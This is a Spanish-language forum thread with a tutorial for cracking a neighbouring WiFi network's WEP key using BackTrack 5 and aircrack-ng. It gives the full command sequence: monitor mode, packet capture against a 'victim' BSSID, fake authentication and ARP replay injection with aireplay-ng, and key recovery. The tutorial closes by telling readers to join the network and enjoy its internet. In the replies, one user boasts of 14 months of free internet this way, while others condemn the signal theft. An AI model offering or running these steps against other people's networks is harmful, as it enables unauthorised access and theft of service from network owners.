Iniciando en BackTrack 5 - T01.- Encontrar WEP Key de una red..

erickevp

Bovino maduro
#1
Hola a todos los Bakunos, pues como ya todos saben ya esta liberado el nuevo BackTrack 5, muchos de los amigos de Ba-k que apenas estan entrando en el mundo de linux, no saben ni para que se usa esto ni con que se come, pues quiero animarlos un poco para que aprendan mas sobre el mundo Linux y de una forma sencilla hagan algo que a mas de uno le llamara la atención.

Voy a poner varios pequeños tutoriales de como hacer las cosas en Linux cosas que nos pueden facilitar la vida y hacer que vean las ventajas practicas de este sistema, aclaro que no me hago responsable del uso que le den a la información, solo la pongo aqui con caracter didactico.

Bueno pues en este caso, les explicare lo que muchos Nuevos Usuarios o Curiosos les puede interesar: Encontrar la Clave WEP de una red Wireless.

1.- Es indispensable que descarguen la Distro de BackTrack5 la quemen en un DVD pues es la que usaremos, despues de eso continuamos.

2.- Inserten el DVD y arranquen su computadora desde el DVD, no tardara en iniciar, y cuando muestre las opciones de arranque seleccionen la primera que es Iniciar BackTrack en modo Texto, no se asusten, ustedes denle enter a esa opción.

3.- Despues de unos segundos o minutos dependiendo de su computadora, les pondra en pantalla la terminal con el usuario ROOT, ojo el password por deafult es toor, ahora para iniciar el ambiente grafico de BackTrack 5 tecleamos lo siguiente:

root@root~# startx

Y esperamos a que cargue el ambiente grafico, ojo solo es la palabra " startx ", les pongo el prompt para que lo ubiquen.

4.- Una vez que ya inicio el sistema solo abrimos una Consola de Terminal, la van a encontrar en la parte superior en los GNOME y en la parte inferior en KDE.
5.- En la consola escribimos lo siguiente:

root@root~# /etc/init.d/networking start

Con esto indicamos que iniciaremos los scripts de trabajo en red.

6.- Usaremos un comando para averiguar la información de nuestro adaptador de red y su interface usada, escribimos lo siguiente

root@root~# airmon-ng

7.- Este comando nos revelara información muy importante para nosotros que es la Interface, Chipset de nuetra placa de red Wireless, y el Driver usado.
En mi caso me muestra lo siguiente

Interface Chipset Driver
wlan0 Atheros AR2425 ath5k - [phy0]

8.- Ahora que conocemos que interface tenemos procedemos a detener sus servicios con el comando siguiente:

root@root~# airmon-ng stop wlan0

9.- Y despues a iniciarlos nuevamente con lo siguiente:

root@root~# airmon-ng start wlan0

10.- Ahora lo que hemos hecho es hacer a nuestra interface wlan0 ponerla en modo monitor para poder ejecutar nuestro ataque a la red. Lo confirmamos con el comando:

root@root~# airmon-ng

Este comando nos dara la siguiente información:

Interface Chipset Driver
wlan0 Atheros AR2425 ath5k - [phy0]
mon0 Atheros AR2425 ath5k - [phy0]

La parte importante aquí es ver que nuestra interface de monitoreo se llama " mon0 " esto en mi caso, puede variar entre distintas computadoras.

11.- Ahora tenemos que escanear las redes disponibles, lo hacemos con el siguiente comando:

root@root~# airodump-ng mon0

En este comando lo que estamos indicando es que nos muestre las redes usando nuestra interface de monitoreo " mon0 "

en este comando nos mostrará mucha información de suma importancia que es la que necesitamos para atacar la red que necesitemos, hay que tomar los datos que aparecen pues los usaremos mas adelante, una vez que termine de escanear detenemos el proceso con las teclas CTRL + C

En pantalla tendremos una tabla con unos datos nos concentraremos en la columna que dice BSSID la cual es la dirección MAC de la red victima, el Canal Inalambrico y su ESSID que es el nombre de la red victima.

12.- Despues de tener los datos usaremos el siguiente comando:

root@root~# airodump-ng -w claves -c 1 --bssid 11:22:33:44:55 mon0

Ojo este paso es muy importante tienen que sustituir el numero 1 por el canal que les muestre la red que quieran atacar, en mi caso es el 1 pero puede ser otro canal, así como donde puse 11:22:33: etc es donde va la dirección MAC de la red a atacar, y por ultimo en donde tengo mon0 es sustituirlo por la interface de cada quien, ahora la indicación -w le estamos diciendo que vamos a guardar los datos capturados, y en la palabra claves, la pueden sustituir por lo que quieran, ahorita les explico como lo usaremos.

13.- una vez que este este comando en funcionamiento mostrara una información de la red que estamos atacando, nos concentraremos en la parte donde dice DATA que son los datos que recibimos de esa red, ahora esa ventana de terminal la dejamos como esta y abrimos una nueva.

14.- Ahora en la nueva ventana de terminal la usaremos para crear una conexion falsa con esa red que estamos atacando, lo hacemos del siguiente modo con este comando:

root@root~# aireplay-ng -1 0 -a 11:22:33:44:55 mon0

De igual forma tienen que reemplazar solo la dirección MAC y la interface.

Mostrara algunos datos y al final dira que se completo satisfactoriamente, ahora dejamos esta ventana abierta y abrimos una nueva, hasta este momento ya debemos de tener tres terminales abiertas.

15.- En nuestra nueva ventana escribimos lo siguiente:

root@root~# aireplay-ng -3 -b 11:22:33:44:55 mon0

Mismas instrucciones reemplacen la dirección MAC y su adaptador, ahora lo que estan haciendo con esto es mandar trafico a travez de la interface " mon0 " a la red atacada, y en la ventana de terminal 1 la que esta transfiriendo datos, ahora se mueve mas rapido la columna que dice DATA, estos son los datos que se transmiten entre tu computadora y la red, bueno pues ya casi terminamos, ahora tendremos que esperar un poco no es mucho en realidad, tenemos que esperar a que tengamos minimo 30,000 paquetes de datos enviados, una vez que lo tengamos en nuestra ventana de terminal 3 solo presionamos CTRL + C para finalizar el proceso.

16.- Bien ahora si comenzamos con lo mejor, descubrir la clave, paa ello solo escribimos lo siguiente:

root@root~# dir

Nos mostrara los nombres de los archivos que estan directamente en el directorio de trabajo, no nos interesa nada mas que un solo archivo, en este caso tomen en cuenta el nombre del parametro que pusieron en el punto no. 12 en mi caso yo lo llame " claves " el archivo que necesito se llama " claves-01.cap "

17.- Ahora si el final, por ultimo ya que tenemos ese archivo escribimos en la misma terminal lo siguiente:

root@root~# aircrack-ng claves-01.cap

Despues de mostrar algo de informacion hara un proceso y por ultimo nos dara la clave buscada, nos la colocara al final junto a una linea similar a la siguiente:

KEY FOUND! [a1:b2:c3:d4:e5] :metal:

:chommy:
es decir nos la segmentara en pares y esa es la clave de red que estamos buscando, ahora si nos podemos meter a la red y disfrutar de internet, o simplemente de los servicios de la red.

----

En el proximo les mostrare como ocultar su verdadera direcció MAC y navegar en la Red LAN de forma anonima, todo usando el BackTrack 5.

Salu2 y espero ke le sirva a mas de uno, sobre todo a los que apenas inician en este mundo de Linux.
 

c@rlito

Bovino de alcurnia
#2
muy interesante, pero tendras algo para cifrado wpa ?
se que debes de tener un buen diccionario pero habra otro metodo ?
gracias y saludos !°
 
#4
El tema es que Backtrack es mucho más que una herramienta para "script kiddies" aunque últimamente lo han rebajado a una herramienta para "romper contraseñas wep". Es una lástima pues no se fomenta el aprendizaje real y además se promueve el robo de señal.

Backtrack son un conjunto de herramientas de auditoría, un concepto que muchos no entienden en su totalidad. De ahí que se emocionan por las nuevas versiones de la misma pensando que ya la hicieron en sus andanzas.
 

ryuk521

Bovino adolescente
#6
no es indispensable bajar Backtrack se puede instalar aircrack en cualquier ditro con
sudo yum install aircrack-ng

o

sudo apt-get install aircrack-ng
 
#7
El tema es que Backtrack es mucho más que una herramienta para "script kiddies" aunque últimamente lo han rebajado a una herramienta para "romper contraseñas wep". Es una lástima pues no se fomenta el aprendizaje real y además se promueve el robo de señal.

Backtrack son un conjunto de herramientas de auditoría, un concepto que muchos no entienden en su totalidad. De ahí que se emocionan por las nuevas versiones de la misma pensando que ya la hicieron en sus andanzas.
Estoy totalmente de acuerdo, desgraciadamente no ven el potencial de esa maravillosa distribución, por favor investiguen un poco mínimo acerca del poder que tienen en sus manos, y dejen de promover el robo de señal, promuevan conocimiento.


:chommy::chommy::chommy::chommy:
 

mangi

Bovino maduro
#9
Exelente aporte camarada, aportes como este me an ayudado mucho pues ya tengo como 14 meses sin pagar internet y en tan solo 4 horas me dio la clave jaja. de verdad se te agradece gracias y sigue adelante
 

rogercet

Bovino maduro
#10
Estoy totalmente de acuerdo, desgraciadamente no ven el potencial de esa maravillosa distribución, por favor investiguen un poco mínimo acerca del poder que tienen en sus manos, y dejen de promover el robo de señal, promuevan conocimiento.


:chommy::chommy::chommy::chommy:
igualmente, estoy de acuerdo con ustedes, pero como siempre un pelo en la sopa...

por que no hacen un tema con ese tipo de informacion puesto que a mi si me serviria y me encantaria que es cas o de hacerse el post me dijeran por MP para checralo jejeje gracias
 

ALEKZK

Bovino maduro
#15
mas facil: desde BT4 viene (mas estable) una aplicacion llamada Gerix Wifi Cracker, ejecutala, selecciona tu tarjeta de red, ponla en modo monitor, snifea, pasa a la siguiente pestaña seleccionando la red a crackear y siqgue picando botones...
 
Arriba